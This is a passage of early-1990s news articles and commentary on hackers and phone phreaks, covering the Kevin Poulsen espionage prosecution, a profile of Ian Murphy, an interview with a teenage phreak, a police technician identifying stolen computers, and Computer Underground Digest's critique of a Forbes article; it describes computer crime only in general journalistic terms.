  5648. authorities in 1983.  The 17-year-old North Hollywood resident, then using the
  5649. handle Dark Dante, allegedly teamed up with an older hacker to break into
  5650. ARPAnet, a Pentagon-organized computer network that links researchers and
  5651. defense contractors around the country. He was not charged with a crime because
  5652. of his age.
  5653.  
  5654. Despite those exploits, Poulsen was later hired by SRI International, a Menlo
  5655. Park-based think tank and government contractor, and given an assistant
  5656. programming job with a security clearance.  Though SRI won't comment, one
  5657. source said Poulsen's job involved testing whether a public data network, by
  5658. means of scrambling devices, could be used to confidentially link classified
  5659. government networks.
  5660.  
  5661. But Poulsen apparently had other sidelines.  Between 1985 and 1988, the Justice
  5662. Department charges, Poulsen burglarized or used phony identification to sneak
  5663. into several Bay Area phone company offices to steal equipment and confidential
  5664. access codes that helped him monitor calls and change records in Pac Bell
  5665. computers, prosecutors say.
  5666.  
  5667.  
  5668. CACHE OF PHONE GEAR
  5669.  
  5670. The alleged activities came to light because Poulsen did not pay a bill at the
  5671. Menlo/Atherton Storage Facility.  The owner snipped off a padlock on a storage
  5672. locker and found an extraordinary cache of telephone paraphernalia.  A 19-count
  5673. indictment, which also named two of Poulsen's associates, included charges of
  5674. theft of government property, possession of wire-tapping devices and phony
  5675. identification.
  5676.  
  5677. One of Poulsen's alleged accomplices, Robert Gilligan, last year pleaded guilty
  5678. to one charge of illegally obtaining Pac Bell access codes.  Under a plea
  5679. bargain, Gilligan received three years of probation, a $25,000 fine, and agreed
  5680. to help authorities in the Poulsen prosecution.  Poulsen's former roommate,
  5681. Mark Lottor, is still awaiting trial.
  5682.  
  5683. A key issue in Poulsen's case concerns CPX Caber Dragon, a code name for a
  5684. military exercise in Fort Bragg, North Carolina.  In late 1987 or early 1988,
  5685. the government charges, Poulsen illegally obtained classified orders for the
  5686. exercise.  But Meltzer insists that the orders had been declassified by the
  5687. time they were seized, and were reclassified after the fact to prosecute
  5688. Poulsen.  Crowe said Meltzer has his facts wrong. "That's the same as saying
  5689. we're framing Poulsen," Crowe said. "That's the worst sort of accusation I can
  5690. imagine."
  5691.  
  5692. Another dispute focuses on the charge of unauthorized access to government
  5693. computers.  FBI agents found an electronic copy of the banner that a computer
  5694. user sees on first dialing up an Army network called MASNET, which includes a
  5695. warning against unauthorized use of the computer system.  Meltzer says Poulsen
  5696. never got beyond this computer equivalent of a "No Trespassing" sign.
  5697.  
  5698. Furthermore, Meltzer argues that the law is unconstitutional because it does
  5699. not sufficiently define whether merely dialing up a computer qualifies as
  5700. illegal "access."
  5701.  
  5702. Meltzer also denies that Poulsen could eavesdrop on calls.  The indictment
  5703. accuses him of illegally owning a device called a direct access test unit,
  5704. which it says is "primarily useful" for surreptitiously intercepting
  5705. communications.  But Meltzer cites an equipment manual showing that the system
  5706. is specifically designed to garble conversations, though it allows phone
  5707. company technicians to tell that a line is in use.
  5708.  
  5709. Crowe said he will soon file written rebuttals to Meltzer's motions.  In
  5710. addition to the new indictment he is seeking, federal prosecutors in Los
  5711. Angeles are believed to be investigating Poulsen's activities while a fugitive.
  5712. Among other things, Poulsen reportedly taunted FBI agents on computer bulletin
  5713. boards frequented by hackers.
  5714.  
  5715.  
  5716. PHONE COMPANIES WORRIED
  5717.  
  5718. Poulsen's prosecution is important to the government -- and phone companies --
  5719. because of their mixed record so far in getting convictions in hacker cases.
  5720.  
  5721. In one of the most embarrassing stumbles, a 19-year-old University of Missouri
  5722. student named Craig Neidorf was indicted in February 1990 on felony charges for
  5723. publishing a memorandum on the emergency 911 system of Bell South.  The case
  5724. collapsed when the phone company information -- which the government said was
  5725. worth $79,940 -- was shown by the defense to be available from another Bell
  5726. system for just $13.50.
  5727.  
  5728. Author Bruce Sterling, whose "The Hacker Crackdown" surveys recent high-tech
  5729. crime and punishment, thinks the phone company overstates the dangers from
  5730. young hackers.  On the other hand, a Toronto high school student electronically
  5731. tampered with that city's emergency telephone dispatching system and was
  5732. arrested, he noted.
  5733.  
  5734. Because systems that affect public safety are involved, law enforcement
  5735. officials are particularly anxious to win convictions and long jail sentences
  5736. for the likes of Poulsen.
  5737.  
  5738. "It's very bad when the government goes out on a case and loses," said one
  5739. computer-security expert who asked not to be identified.  "They are desperately
  5740. trying to find something to hang him on."
  5741.  
  5742. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5743.  
  5744.  Computer Hacker Charged With Stealing Military Secrets        December 8, 1992
  5745.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5746.  Taken from the Associated Press
  5747.  
  5748. SAN FRANCISCO -- A computer hacker has been charged with stealing Air Force
  5749. secrets that allegedly included a list of planned targets in a hypothetical
  5750. war.
  5751.  
  5752. Former Silicon Valley computer whiz Kevin Poulsen, who was accused in the early
  5753. 1980s as part of a major hacking case, was named in a 14-count indictment
  5754. issued Monday.
  5755.  
  5756. He and an alleged accomplice already face lesser charges of unlawful use of
  5757. telephone access devices, illegal wiretapping and conspiracy.
  5758.  
  5759. Poulsen, 27, of Los Angeles, faces 7-to-10 years in prison if convicted of the
  5760. new charge of gathering defense information, double the sentence he faced
  5761. previously.
  5762.  
  5763. His lawyer, Paul Meltzer, says the information was not militarily sensitive and
  5764. that it was reclassified by government officials just so they could prosecute
  5765. Poulsen on a greater charge.
  5766.  
  5767. A judge is scheduled to rule February 1 on Meltzer's motion to dismiss the
  5768. charge.
  5769.  
  5770. In the early 1980s, Poulsen and another hacker going by the monicker Dark Dante
  5771. were accused of breaking into UCLA's computer network in one of the first
  5772. prosecutions of computer hacking.
  5773.  
  5774. He escaped prosecution because he was then a juvenile and went to work at Sun
  5775. Microsystems in Mountain View.
  5776.  
  5777. While working for Sun, Poulsen illegally obtained a computer tape containing a
  5778. 1987 order concerning a military exercise code-named Caber Dragon 88, the
  5779. government said in court papers.  The order is classified secret and contains
  5780. names of military targets, the government said.
  5781.  
  5782. In 1989, Poulsen and two other men were charged with stealing telephone access
  5783. codes from a Pacific Bell office, accessing Pacific Bell computers, obtaining
  5784. unpublished phone numbers for the Soviet Consulate in San Francisco; dealing in
  5785. stolen telephone access codes; and eavesdropping on two telephone company
  5786. investigators.
  5787.  
  5788. Poulsen remained at large until a television show elicited a tip that led to
  5789. his capture in April 1991.
  5790.  
  5791. He and Mark Lottor, 27, of Menlo Park, are scheduled to be tried in March.  The
  5792. third defendant, Robert Gilligan, has pleaded guilty and agreed to pay Pacific
  5793. Bell $25,000.  He is scheduled to testify against Lottor and Poulsen as part of
  5794. a plea bargain.
  5795.  
  5796. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5797.  
  5798.  CA Computer Whiz Is First Hacker Charged With Espionage      December 10, 1992
  5799.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5800.  by John Enders (The Associated Press)
  5801.  
  5802. SAN JOSE, California -- A 28-year-old computer whiz who reportedly once tested
  5803. Department of Defense security procedures has become the first alleged computer
  5804. hacker to be charged with espionage.
  5805.  
  5806. The government says Kevin Lee Poulsen stole classified military secrets and
  5807. should go to prison.  But his lawyer calls him "an intellectually curious
  5808. computer nerd."
  5809.  
  5810. Poulsen, of Menlo Park, California, worked in the mid-1980s as a consultant
  5811. testing Pentagon computer security.  Because of prosecution delays, he was held
  5812. without bail in a San Jose jail for 20 months before being charged this week.
  5813.  
  5814. His attorney, Paul Meltzer, says that Poulsen did not knowingly possess
  5815. classified information.  The military information had been declassified by the
  5816. time prosecutors say Poulsen obtained it, Meltzer said.
  5817.  
  5818. "They are attempting to make him look like Julius Rosenberg," Meltzer said of
  5819. the man executed in 1953 for passing nuclear-bomb secrets to the Soviet Union.
  5820. "It's just ridiculous."
  5821.  
  5822. Poulsen was arrested in 1988 on lesser but related hacking charges. He
  5823. disappeared before he was indicted and was re-arrested in Los Angeles in April
  5824. 1991.  Under an amended indictment, he was charged with illegal possession of
  5825. classified government secrets.
  5826.  
  5827. Poulsen also is charged with 13 additional counts, including eavesdropping on
  5828. private telephone conversations and stealing telephone company equipment.
  5829.  
  5830. If convicted on all counts, he faces up to 85 years in prison and fines
  5831. totaling $3.5 million, said Assistant U.S. Attorney Robert Crowe in San
  5832. Francisco.
  5833.  
  5834. On Monday (12/7), Poulsen pleaded innocent to all charges.  He was handed over
  5835. to U.S. Marshals in San Jose on Wednesday (12/9) and was being held at a
  5836. federal center in Pleasanton near San Francisco.
  5837.  
  5838. He hasn't been available for comment, but in an earlier letter from prison,
  5839. Poulsen called the charges "ludicrous" and said the government is taking
  5840. computer hacking too seriously.
  5841.  
  5842. U.S. Attorney John A. Mendez said Wednesday (12/9) that Poulsen is not
  5843. suspected of turning any classified or non-classified information over to a
  5844. foreign power, but he said Poulsen's alleged activities are being taken very
  5845. seriously.
  5846.  
  5847. "He's unique.  He's the first computer hacker charged with this type of
  5848. violation -- unlawful gathering of defense information," Mendez said.
  5849.  
  5850. Assistant U.S. Attorney Robert Crowe said the espionage charge was entered only
  5851. after approval from the Justice Department's internal security section in
  5852. Washington.
  5853.  
  5854. The indictment alleges that Poulsen:
  5855.  
  5856. - Tapped into the Pacific Bell Co.'s computer and collected unpublished
  5857.   telephone numbers and employee lists for the Soviet Consulate in San
  5858.   Francisco.
  5859.  
  5860. - Stole expensive telephone switching and other equipment.
  5861.  
  5862. - Retrieved records of phone company security personnel and checked records of
  5863.   their own calls to see if they were following him.
  5864.  
  5865. - Eavesdropped on telephone calls and computer electronic mail between phone
  5866.   company investigators and some of his acquaintances.
  5867.  
  5868. - Tapped into an unclassified military computer network known as Masnet.
  5869.  
  5870. - Obtained a classified document on flight orders for a military exercise
  5871.   involving thousands of paratroopers at the Army's Fort Bragg in North
  5872.   Carolina.
  5873.  
  5874. The offenses allegedly took place between 1986 and 1988.
  5875.  
  5876. In 1985, the Palo Alto, California, think tank SRI International hired Poulsen
  5877. to work on military contracts, including a sensitive experiment to test
  5878. Pentagon computer security, according to published reports.  SRI has declined
  5879. to comment on the case.
  5880. _______________________________________________________________________________
  5881.  
  5882.  Hacker For Hire                                               October 19, 1992
  5883.  ~~~~~~~~~~~~~~~
  5884.  by Mark Goodman and Allison Lynn (People)(Page 151)
  5885.  
  5886.         "Real-life Sneaker Ian Murphy puts the byte on corporate spies."
  5887.  
  5888. THERE'S NO PRIVACY THESE DAYS," says Ian Murphy.  "Just imagine going into GM's
  5889. or IBM's accounts and wiping them out.  You can bring about economic collapse
  5890. by dropping in a virus without them even knowing it."  Scoff at your peril,
  5891. Corporate America.  Captain Zap -- as Murphy is known in the electronic
  5892. underworld of computer hackers -- claims there's no computer system he can't
  5893. crack, and hence no mechanical mischief he can't wreak on corporations or
  5894. governments.  And Murphy, 35, has the track record -- not to mention the
  5895. criminal record -- to back up his boasts.
  5896.  
  5897. Murphy's fame in his subterranean world is such that he worked as a consultant
  5898. for Sneakers, the hit film about a gang of computer-driven spies (Robert
  5899. Redford, Sidney Poitier, Dan Aykroyd) lured into doing some high-risk
  5900. undercover work for what they believe is the National Security Agency.
  5901.  
  5902. Murphy loved the way the movie turned out.  "It's like a training film for
  5903. hackers," he says, adding that he saw much of himself in the Aykroyd character,
  5904. a pudgy, paranoid fantasist named Mother who, like Murphy, plows through
  5905. people's trash for clues.  In fact when Aykroyd walked onscreen covered with
  5906. trash, Murphy recalls, "My friends turned to me and said, 'Wow, that's you!'"
  5907. If that sounds like a nerd's fantasy, then check out Captain Zap's credentials.
  5908. Among the first Americans to be convicted of a crime involving  computer break-
  5909. ins, he served only some easy community-service time in 1983 before heading
  5910. down the semistraight, not necessarily narrow, path of a corporate spy.
  5911.  
  5912. Today, Murphy, 35, is president of IAM Secure Data Systems, a security
  5913. consultant group he formed in 1982.  For a fee of $5,000 a day plus expenses,
  5914. Murphy has dressed up as a phone-company employee and cracked a bank's security
  5915. system, he has aided a murder investigation for a drug dealer's court defense,
  5916. and he has conducted a terrorism study for a major airline.  His specialty,
  5917. though, is breaking into company security systems -- an expertise he applied
  5918. illegally in his outlaw hacker days and now, legally, by helping companies
  5919. guard against such potential break-ins.  Much of his work lately, he says,
  5920. involves countersurveillance -- that is, finding out if a corporation's
  5921. competitors are searching its computer systems for useful information.  "It's
  5922. industrial spying," Murphy says, "and it's happening all over the place."
  5923.  
  5924. Murphy came by his cloak-and-daggerish calling early.  He grew up in Gladwyne,
  5925. Pennsylvania, on Philadelphia's Main Line, the son of Daniel Murphy, a retired
  5926. owner of a stevedoring business, and his wife, Mary Ann, an advertising
  5927. executive.  Ian recalls, "As a kid, I was bored.  In science I did wonderfully.
  5928. The rest of it sucked.  And social skills weren't my thing."
  5929.  
  5930. Neither was college.  Ian had already begun playing around with computers at
  5931. Archbishop Carroll High School; after graduation he joined the Navy.  He got an
  5932. early discharge in 1975 when the Navy didn't assign him to radio school as
  5933. promised, and he returned home to start hacking with a few pals.  In his
  5934. heyday, he claims, he broke into White House and Pentagon computers.  "In the
  5935. Pentagon," he says, "we were playing in the missile department, finding out
  5936. about the new little toys they were developing and trying to mess with their
  5937. information. None of our break-ins had major consequences, but it woke them the
  5938. hell up because they [had] all claimed it couldn't be done."
  5939.  
  5940. Major consequences came later.  Murphy and his buddies created dummy
  5941. corporations with Triple-A credit ratings and ordered thousands of dollars'
  5942. worth of computer equipment.  Two years later the authorities knocked at
  5943. Murphy's door.  His mother listened politely to the charges, then earnestly
  5944. replied, "You have the wrong person.  He doesn't know anything about
  5945. computers."
  5946.  
  5947. Right.  Murphy was arrested and convicted of receiving stolen property in 1982.
  5948. But because there were no federal computer-crime laws at that time, he got off
  5949. with a third-degree felony count.  He was fined $1,000, ordered to provide
  5950. 1,000 hours of community service (he worked in a homeless shelter) and placed
  5951. on probation for 2 1/2 years.  "I got off easy," he concedes.
  5952.  
  5953. Too easy, by his own mother's standards.  A past president of Republican Women
  5954. of the Main Line, Mary Ann sought out her Congressman, Larry Coughlin, and put
  5955. the question to him: "How would you like it if the next time you ran for
  5956. office, some young person decided he was going to change all of your files?"
  5957. Coughlin decided he wouldn't like it and raised the issue on the floor of
  5958. Congress in 1983.  The following year, Congress passed a national computer-
  5959. crime law, making it illegal to use a computer in a manner not authorized by
  5960. the owner.
  5961.  
  5962. Meanwhile, Murphy, divorced in 1977 after a brief marriage, had married Carol
  5963. Adrienne, a documentary film producer, in 1982.  Marriage evidently helped set
  5964. Murphy straight, and he formed his company -- now with a staff of 12 that
  5965. includes a bomb expert and a hostage expert.  Countersurveillance has been
  5966. profitable (he's making more than $250,000 a year and is moving out of his
  5967. parents' house), but it has left him little time to work on his social skills -
  5968. - or for that matter his health.  At 5 ft.6 in. and 180 lbs., wearing jeans,
  5969. sneakers and a baseball cap, Murphy looks like a Hollywood notion of himself.
  5970. He has suffered four heart attacks since 1986 but unregenerately smokes a pack
  5971. of cigarettes a day and drinks Scotch long before the sun falls over the
  5972. yardarm.
  5973.  
  5974. He and Carol divorced in April 1991, after 10 years of marriage.  "She got
  5975. ethics and didn't like the work I did," he says.  These days Murphy dates --
  5976. but not until he thoroughly "checks" the women he goes out with.  "I want to
  5977. know who I'm dealing with because I could be dealing with plants," he explains.
  5978. "The Secret Service plays games with hackers."
  5979.  
  5980. Murphy does retain a code of honor.  He will work for corporations, helping to
  5981. keep down the corporate crime rate, he says, but he won't help gather evidence
  5982. to prosecute fellow hackers.  Indeed his rogue image makes it prudent for him
  5983. to stay in the background.  Says Reginald Branham, 23, president of Cyberlock
  5984. Consulting, with whom Murphy recently developed a comprehensive antiviral
  5985. system: "I prefer not to take Ian to meetings with CEOs.  They're going to
  5986. listen to him and say, 'This guy is going to tear us apart.'"  And yet Captain
  5987. Zap, for all his errant ways, maintains a certain peculiar charm.  "I'm like
  5988. the Darth Vader of the computer world," he insists.  "In the end I turn out to
  5989. be the good guy."
  5990.  
  5991. (Photograph 1 = Ian Murphy)
  5992. (Photograph 2 = River Phoenix, Robert Redford, Dan Aykroyd, and Sidney Poitier)
  5993. (Photograph 3 = Mary Ann Murphy <Ian's mom>)
  5994. _______________________________________________________________________________
  5995.  
  5996.  Yacking With A Hack                                                August 1992
  5997.  ~~~~~~~~~~~~~~~~~~~
  5998.  by Barbara Herman (Teleconnect)(Page 60)
  5999.  
  6000.                  "Phone phreaking for fun, profit & politics."
  6001.  
  6002. Ed is an intelligent, articulate 18 year old.  He's also a hacker, a self-
  6003. professed "phreak" -- the term that's developed in a subculture of usually
  6004. young, middle-class computer whizzes.
  6005.  
  6006. I called him at his favorite phone booth.
  6007.  
  6008. Although he explained how he hacks as well as what kinds of hacking he has been
  6009. involved in, I was especially interested in why he hacks.
  6010.  
  6011. First off, Ed wanted to make it clear he doesn't consider himself a
  6012. "professional" who's in it only for the money.  He kept emphasizing that
  6013. "hacking is not only an action, it's a state of mind."
  6014.  
  6015. Phreaks even have an acronym-based motto that hints at their overblown opinions
  6016. of themselves.  PHAC.  It describes what they do: "phreaking," "hacking,"
  6017. "anarchy" and "carding."  In other words, they get into systems over the
  6018. telecom network (phreaking), gain access (hacking), disrupt the systems
  6019. (political anarchy) and use peoples' calling/credit cards for their personal
  6020. use.
  6021.  
  6022. Throughout our talk, Ed showed no remorse for hacking.  Actually, he had
  6023. contempt for those he hacked.  Companies were "stupid" because their systems'
  6024. were so easy to crack.  They deserved it.
  6025.  
  6026. As if they should have been thankful for his mercy, he asked me to imagine what
  6027. would have happened if he really hacked one railway company's system (he merely
  6028. left a warning note), changing schedules and causing trains to collide.
  6029.  
  6030. He also had a lot of disgust for the "system," which apparently includes big
  6031. business (he is especially venomous toward AT&T), government, the FBI, known as
  6032. "the Gestapo" in phreak circles, and the secret service, whose "intelligence
  6033. reflects what their real jobs should be, secret service station attendants."
  6034.  
  6035. He doesn't really believe any one is losing money on remote access toll fraud.
  6036.  
  6037. He figures the carriers are angry not about money lost but rather hypothetical
  6038. money, the money they could have charged for the free calls the hackers made,
  6039. which he thinks are overpriced to begin with.
  6040.  
  6041. He's also convinced (wrongly) that companies usually don't foot the bill for
  6042. the free calls hackers rack up on their phone systems.  "And, besides, if some
  6043. multi-million dollar corporation has to pay, I'm certainly not going to cry for
  6044. them."
  6045.  
  6046. I know.  A twisted kid.  Weird.  But besides his skewed ethics, there's also a
  6047. bunch of contradictions.
  6048.  
  6049. He has scorn for companies who can't keep him out, even though he piously warns
  6050. them to try.
  6051.  
  6052. He dismisses my suggestion that the "little guy" is in fact paying the bills
  6053. instead of the carrier.  And yet he says AT&T is overcharging them for the
  6054. "vital" right to communicate with each other.
  6055.  
  6056. He also contradicted his stance of being for the underdog by calling the
  6057. railway company "stupid" for not being more careful with their information.
  6058.  
  6059. Maybe a railway company is not necessarily the "little guy," but it hardly
  6060. seems deserving of the insults Ed hurled at it.  When I mentioned that a
  6061. hospital in New York was taken for $100,000 by hackers, he defended the hackers
  6062. by irrelevantly making the claim that doctors easily make $100,000 a year.
  6063. Since when did doctors pay hospital phone bills?
  6064.  
  6065. What Ed is good at is rationalizing.  He lessens his crimes by raising them to
  6066. the status of political statements, and yet in the same breath, for example, he
  6067. talks about getting insider info on the stock market and investing once he
  6068. knows how the stock is doing.  He knows it's morally wrong, he told me, but
  6069. urged me to examine this society that "believes in making a buck any way you
  6070. can.  It's not a moral society."
  6071.  
  6072. Amazingly enough, the hacker society to which Ed belongs, if I can
  6073. unstatistically use him as a representative of the whole community, is just as
  6074. tangled in the contradictions of capitalism as the "system" they supposedly
  6075. loathe.  In fact, they are perhaps more deluded and hypocritical because they
  6076. take a political stance rather than recognizing their crimes for what they are.
  6077. How can Ed or anyone else in the "phreaking" community take seriously their
  6078. claims of being against big business and evil capitalism when they steal
  6079. people's credit-card and calling-card numbers and use them for their own
  6080. profit?
  6081.  
  6082. The conversation winded down after Ed rhapsodized about the plight of the
  6083. martyred hacker who is left unfairly stigmatized after he is caught, or "taken
  6084. down."
  6085.  
  6086. One time the Feds caught his friend hacking ID codes, had several phone
  6087. companies and police search his house, and had his computer taken away.  Even
  6088. though charges were not filed, Ed complained, "It's not fair."
  6089.  
  6090. That's right, phreak.  They should have thrown him in prison.
  6091. _______________________________________________________________________________
  6092.  
  6093.  Computer Hacker On Side Of Law                              September 23, 1992
  6094.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6095.  by Shelby Grad (Los Angeles Times)(Page B3)
  6096.  
  6097. COSTA MESA, CA -- Philip Bettencourt's formal title is photo lab supervisor for
  6098. the Costa Mesa Police Department.  But on Tuesday afternoon, he served as the
  6099. department's official computer hacker.
  6100.  
  6101. Bettencourt, pounding the keyboard excitedly as other officers looked on, was
  6102. determined to find information within a stolen computer's vast memory that
  6103. would link the machine to its owner.
  6104.  
  6105. So far, he had made matches for all but two of the 26 computers recovered
  6106. earlier this month by police as part of a countywide investigation of stolen
  6107. office equipment.  This would be number 25.
  6108.  
  6109. First, he checked the hard drive's directory, searching for a word-processing
  6110. program that might include a form letter or fax cover sheet containing the
  6111. owner's name, address or phone number.
  6112.  
  6113. When that failed, he tapped into an accounting program, checking for clues on
  6114. the accounts payable menu.
  6115.  
  6116. "Bingo!"  Bettencourt yelled a few minutes into his work.  He found an invoice
  6117. account number to a Fountain Valley cement company that might reveal the
  6118. owner's identity.  Seconds later, he came across the owner's bank credit-card
  6119. number.
  6120.  
  6121. And less than a minute after that, Bettencourt hit pay dirt: The name of a
  6122. Santa Ana building company that, when contacted, revealed that it had indeed
  6123. been the victim of a recent computer burglary.
  6124.  
  6125. "This is great," said Bettencourt, who has been interested in computers for
  6126. nearly two decades now, ever since Radio Shack put its first model on the
  6127. market.  "I love doing this.  This is hacking, but it's in a good sense, not
  6128. trying to hurt someone.  This is helping people."
  6129.  
  6130. Few computer owners who were reunited with their equipment would contest that.
  6131. When Costa Mesa police recovered $250,000 worth of computers, fax machines,
  6132. telephones and other office gadgets, detectives were faced with the difficult
  6133. task of matching machines bearing few helpful identifying marks to their
  6134. owners, said investigator Bob Fate.
  6135.  
  6136. Enter Bettencourt, who tapped into the computers' hard drives, attempting to
  6137. find the documents that would reveal from whom the machines were taken.
  6138.  
  6139. As of Tuesday, all but $50,000 worth of equipment was back in owners' hands.
  6140. Investigators suggested that people who recently lost office equipment call the
  6141. station to determine if some of the recovered gadgetry belongs to them.
  6142.  
  6143. Ironically, the alleged burglars tripped themselves up by not erasing the data
  6144. from the computers before reselling the machines, authorities said.  A college
  6145. student who purchased one of the stolen computers found data from the previous
  6146. owner, whom he contacted.  Police were then called in, and a second "buy" was
  6147. scheduled in which several suspects were arrested, Fate said.
  6148.  
  6149. Three people were arrested September 15 and charged with receiving and
  6150. possessing stolen property.  Police are still searching for the burglars.
  6151.  
  6152. The office equipment was recovered from an apartment and storage facility in
  6153. Santa Ana.
  6154.  
  6155. Bettencourt matched the final stolen computer to its owner before sundown
  6156. Tuesday.
  6157. _______________________________________________________________________________
  6158.  
  6159.  CuD's 1992 MEDIA HYPE Award To FORBES MAGAZINE
  6160.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6161.  by Jim Thomas (Computer Underground Digest)
  6162.  
  6163. In recent years, media depiction of "hackers" has been criticized for
  6164. inaccurate and slanted reporting that exaggerates the public dangers of the
  6165. dread "hacker menace." As a result, CuD annually recognizes the year's most
  6166. egregious example of media hype.
  6167.  
  6168. The 1992 annual CuD GERALDO RIVERA MEDIA HYPE award goes to WILLIAM G. FLANAGAN
  6169. AND BRIGID McMENAMIN for their article "The Playground Bullies are Learning how
  6170. to Type" in the 21 December issue of Forbes (pp 184-189).  The authors improved
  6171. upon last year's winner, Geraldo himself, in inflammatory rhetoric and
  6172. distorted narrative that seems more appropriate for a segment of "Inside
  6173. Edition" during sweeps week than for a mainstream conservative periodical.
  6174.  
  6175. The Forbes piece is the hands-down winner for two reasons.  First, one reporter
  6176. of the story, Brigid McMenamin, was exceptionally successful in creating for
  6177. herself an image as clueless and obnoxious. Second, the story itself was based
  6178. on faulty logic, rumors, and some impressive leaps of induction.  Consider the
  6179. following.
  6180.  
  6181.  
  6182.                          The Reporter: Brigid McMenamin
  6183.  
  6184. It's not only the story's gross errors, hyperbole, and irresponsible distortion
  6185. that deserve commendation/condemnation, but the way that Forbes reporter Brigid
  6186. McMenamin tried to sell herself to solicit information.
  6187.  
  6188. One individual contacted by Brigid McM claimed she called him several times
  6189. "bugging" him for information, asking for names, and complaining because
  6190. "hackers" never called her back.  He reports that she explicitly stated that
  6191. her interest was limited to the "illegal stuff" and the "crime aspect" and was
  6192. oblivious to facts or issues that did not bear upon hackers-as-criminals.
  6193.  
  6194. Some persons present at the November 2600 meeting at Citicorp, which she
  6195. attended, suggested the possibility that she used another reporter as a
  6196. credibility prop, followed some of the participants to dinner after the
  6197. meeting, and was interested in talking only about illegal activities. One
  6198. observer indicated that those who were willing to talk to her might not be the
  6199. most credible informants.  Perhaps this is one reason for her curious language
  6200. in describing the 2600 meeting.
  6201.  
  6202. Another person she contacted indicated that she called him wanting names of
  6203. people to talk to and indicated that because Forbes is a business magazine, it
  6204. only publishes the "truth."  Yet, she seemed not so much interested in "truth,"
  6205. but in finding "evidence" to fit a story.  He reports that he attempted to
  6206. explain that hackers generally are interested in Unix and she asked if she
  6207. could make free phone calls if she knew Unix.  Although the reporter stated to
  6208. me several times that she had done her homework, my own conversation with her
  6209. contradicted her claims, and if the reports of others are accurate, here claims
  6210. of preparation seem disturbingly exaggerated.
  6211.  
  6212. I also had a rather unpleasant exchange with Ms. McM.  She was rude, abrasive,
  6213. and was interested in obtaining the names of "hackers" who worked for or as
  6214. "criminals." Her "angle" was clearly the hacker-as-demon.  Her questions
  6215. suggested that she did not understand the culture about which she was writing.
  6216. She would ask questions and then argue about the answer, and was resistant to
  6217. any "facts" or responses that failed to focus on "the hacker criminal." She
  6218. dropped Emmanuel Goldstein's name in a way that I interpreted as indicating a
  6219. closer relationship than she had--an incidental sentence, but one not without
  6220. import -- which I later discovered was either an inadvertently misleading
  6221. choice of words or a deliberate attempt to deceptively establish credentials.
  6222. She claimed she was an avowed civil libertarian.  I asked why, then, she didn't
  6223. incorporate some of those issues. She invoked publisher pressure.  Forbes is a
  6224. business magazine, she said, and the story should be of interest to readers.
  6225. She indicated that civil liberties weren't related to "business."  She struck
  6226. me as exceptionally ill-informed and not particularly good at soliciting
  6227. information.  She also left a post on Mindvox inviting "hackers" who had been
  6228. contacted by "criminals" for services to contact her.
  6229.  
  6230.      >Post: 150 of 161
  6231.      >Subject: Hacking for Profit?
  6232.      >From: forbes (Forbes Reporter)
  6233.      >Date: Tue, 17 Nov 92 13:17:34 EST
  6234.      >
  6235.      >Hacking for Profit?  Has anyone ever offered to pay you (or
  6236.      >a friend) to get into a certain system and alter, destroy or
  6237.      >retrieve information?  Can you earn money hacking credit
  6238.      >card numbers, access codes or other information? Do you know
  6239.      >where to sell it?  Then I'd like to hear from you.  I'm
  6240.      >doing research for a magazine article.  We don't need you
  6241.      >name.  But I do want to hear your story.  Please contact me
  6242.      >Forbes@mindvox.phantom.com.
  6243.  
  6244. However, apparently she wasn't over-zealous about following up her post or
  6245. reading the Mindvox conferences.  When I finally agreed to send her some
  6246. information about CuD, she insisted it be faxed rather than sent to Mindvox
  6247. because she was rarely on it.  Logs indicate that she made only six calls to
  6248. the board, none of which occurred after November 24.
  6249.  
  6250. My own experience with the Forbes reporter was consistent with those of others.
  6251. She emphasized "truth" and "fact-checkers," but the story seems short on both.
  6252. She emphasized explicitly that her story would *not* be sensationalistic. She
  6253. implied that she wanted to focus on criminals and that the story would have the
  6254. effect of presenting the distinction between "hackers" and real criminals.
  6255. Another of her contacts also appeared to have the same impression.  After our
  6256. less-than-cordial discussion, she reported it to the contact, and he attempted
  6257. to intercede on her behalf in the belief that her intent was to dispel many of
  6258. the media inaccuracies about "hacking."  If his interpretation is correct, then
  6259. she deceived him as well, because her portrayal of him in the story was
  6260. unfavorably misleading.
  6261.  
  6262. In CuD 4.45 (File #3), we ran Mike Godwin's article on "How to Talk to the
  6263. Press," which should be required reading. His guidelines included:
  6264.  
  6265.      1) TRY TO THINK LIKE THE REPORTER YOU'RE TALKING TO.
  6266.      2) IF YOU'RE GOING TO MEET THE REPORTER IN PERSON, TRY TO
  6267.         BRING SOMETHING ON PAPER.
  6268.      3) GIVE THE REPORTER OTHER PEOPLE TO TALK TO, IF POSSIBLE.
  6269.      4) DON'T ASSUME THAT THE REPORTER WILL COVER THE STORY THE WAY
  6270.         YOU'D LIKE HER TO.
  6271.  
  6272. Other experienced observers contend that discussing "hacking" with the press
  6273. should be avoided unless one knows the reporter well or if the reporter has
  6274. established sufficient credentials as accurate and non-sensationalist.  Using
  6275. these criteria, it will probably be a long while before any competent
  6276. cybernaught again speaks to Brigid McMenamin.
  6277.  
  6278.  
  6279.                                    The Story
  6280.  
  6281. Rather than present a coherent and factual story about the types of computer
  6282. crime, the authors instead make "hackers" the focal point and use a narrative
  6283. strategy that conflates all computer crime with "hackers."
  6284.  
  6285. The story implies that Len Rose is part of the "hacker hood" crowd.  The lead
  6286. reports Rose's prison experience and relates his feeling that he was "made an
  6287. example of" by federal prosecutors.  But, asks the narrative, if this is so,
  6288. then why is the government cracking down? Whatever else one might think of Len
  6289. Rose, no one ever has implied that he as a "playground bully" or "hacker hood."
  6290. The story also states that 2600 Magazine editor Emmanuel Goldstein "hands
  6291. copies <of 2600> out free of charge to kids.  Then they get arrested." (p. 188-
  6292. -a quote attributed to Don Delaney), and distorts (or fabricates) facts to fit
  6293. the slant:
  6294.  
  6295.      According to one knowledgeable source, another hacker brags
  6296.      that he recently found a way to get into Citibank's
  6297.      computers. For three months he says he quietly skimmed off a
  6298.      penny or so from each account. Once he had $200,000, he quit.
  6299.      Citibank says it has no evidence of this incident and we
  6300.      cannot confirm the hacker's story.  But, says computer crime
